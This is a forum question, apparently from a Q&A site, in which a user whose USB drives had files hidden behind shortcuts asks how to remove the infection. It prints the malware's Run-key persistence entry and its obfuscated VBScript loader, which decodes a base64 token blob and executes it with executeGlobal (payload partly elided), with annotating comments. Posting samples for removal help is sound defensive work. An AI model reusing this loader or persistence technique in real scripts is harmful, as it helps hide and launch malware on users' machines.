Creating unnecessary shortcuts on flash drive [duplicate]
This question already has an answer here:
How do I deal with a compromised server? 2 answers
Recently my computer was infected by a strange kind of virus (maybe)
that hides all the files and folders on a flash drive and creates
shortcuts to them instead. The shortcuts are, however, properly linked to the
files.
After a little investigation, I found the file File.vbs on every flash drive
that had been connected to such an infected computer, with the following content
(content below).
There is also a registry entry under the path
computer\HKEY_USERS\S-1-5-21-427534298-769945857-2295768042-1000\software\microsoft\windows\currentversion\run
with the following value:
wscript.exe //B "C:\Users\<username>\AppData\Local\Temp\File.vbs"
' Obfuscated loader stub, shown as posted (the author elided most of the payload string,
' so the assignment below is not complete, runnable code).
' The payload is stored as a list of base64 tokens separated by the character "1";
' every token visible here decodes to a single character (e.g. "Jw==" is an apostrophe).
' NOTE(review): the visible tail of the string decodes to the closing lines of a VBScript
' function named "cmdshell" ("cmdshell = readallfromany" / "end function"); the rest of
' the payload is not shown on the page.
Taakj2005="Jw==1PA== < [this thing is repeated about 1000 times >]
Q==1IA==1DQ==1Cg==1IA==1IA==1IA==1cg==1ZQ==1YQ==1ZA==1YQ==1bA==1bA==1Zg==1cg==1bw==1bQ==1YQ==1bg==1eQ==1IA==1PQ==1IA==1Ig==1Ig==1DQ==1Cg==1ZQ==1bg==1ZA==1IA==1aQ==1Zg==1DQ==1Cg==1DQ==1Cg==1Yw==1bQ==1ZA==1cw==1aA==1ZQ==1bA==1bA==1IA==1PQ==1IA==1cg==1ZQ==1YQ==1ZA==1YQ==1bA==1bA==1Zg==1cg==1bw==1bQ==1YQ==1bg==1eQ==1DQ==1Cg==1ZQ==1bg==1ZA==1IA==1Zg==1dQ==1bg==1Yw==1dA==1aQ==1bw==1bg==1"
' Break the blob into its individual base64 tokens.
Taakj2005=SPLIT(Taakj2005,"1")
' The string ends with the delimiter, so the last array element is empty; the "-1" skips it.
FOR KAKAROTTO = 0 TO UBOUND(Taakj2005) -1
' Decode one token and append it to the reconstructed script text.
SilentLOVE = SilentLOVE & Base64Decode(Taakj2005(KAKAROTTO))
NEXT
' Runs the reconstructed text as VBScript in the global scope: this is where the hidden
' payload actually executes. When analysing a sample like this, decode and print the text
' in an isolated environment instead of letting this line run.
executeGlobal (SilentLOVE)
' Base64Encode: returns the base64 text for sText.
' sText is converted to bytes by Stream_StringToBinary, stored in an MSXML element whose
' dataType is "bin.base64", and read back through the element's .text property.
' NOTE(review): the loader lines shown with this sample call only Base64Decode; whether
' the hidden payload calls this function cannot be told from the page.
Function Base64Encode(sText)
Dim oXML, oNode
' MSXML is used only as a base64 codec; no XML document is loaded or saved.
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
' Assigning the raw bytes lets MSXML produce the base64 representation.
oNode.nodeTypedValue =Stream_StringToBinary(sText)
Base64Encode = oNode.text
' Release the COM objects.
Set oNode = Nothing
Set oXML = Nothing
End Function
' Base64Decode: returns the text encoded by the base64 string vCode.
' vCode is placed in an MSXML element whose dataType is "bin.base64"; the element's
' nodeTypedValue then yields the decoded bytes, which Stream_BinaryToString turns into text.
' The loader stub calls this once per token to rebuild the hidden script.
Function Base64Decode(ByVal vCode)
Dim oXML, oNode
' MSXML is used only as a base64 codec; no XML document is loaded or saved.
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
' Setting .text to the base64 string makes nodeTypedValue return the decoded bytes.
oNode.text = vCode
Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
' Release the COM objects.
Set oNode = Nothing
Set oXML = Nothing
End Function
' Stream_StringToBinary: returns the bytes of Text, converted with the "us-ascii" charset.
' The text is written to an ADODB.Stream in text mode, then the same stream is switched
' to binary mode and read back.
Function Stream_StringToBinary(Text)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
BinaryStream.Open
BinaryStream.WriteText Text
' ADODB.Stream allows Type to be changed only at position 0, hence the rewind first.
BinaryStream.Position = 0
BinaryStream.Type = adTypeBinary
' Second rewind so that Read starts at the beginning of the stream.
BinaryStream.Position = 0
Stream_StringToBinary = BinaryStream.Read
' The stream is not closed explicitly; only the reference is released.
Set BinaryStream = Nothing
End Function
' Stream_BinaryToString: returns the bytes in Binary as text, read with the "us-ascii" charset.
' The bytes are written to an ADODB.Stream in binary mode, then the same stream is switched
' to text mode and read back. Base64Decode uses this to turn decoded bytes into script text.
Function Stream_BinaryToString(Binary)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write Binary
' ADODB.Stream allows Type to be changed only at position 0, hence the rewind first.
BinaryStream.Position = 0
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
Stream_BinaryToString = BinaryStream.ReadText
' The stream is not closed explicitly; only the reference is released.
Set BinaryStream = Nothing
End Function
How do I get rid of this?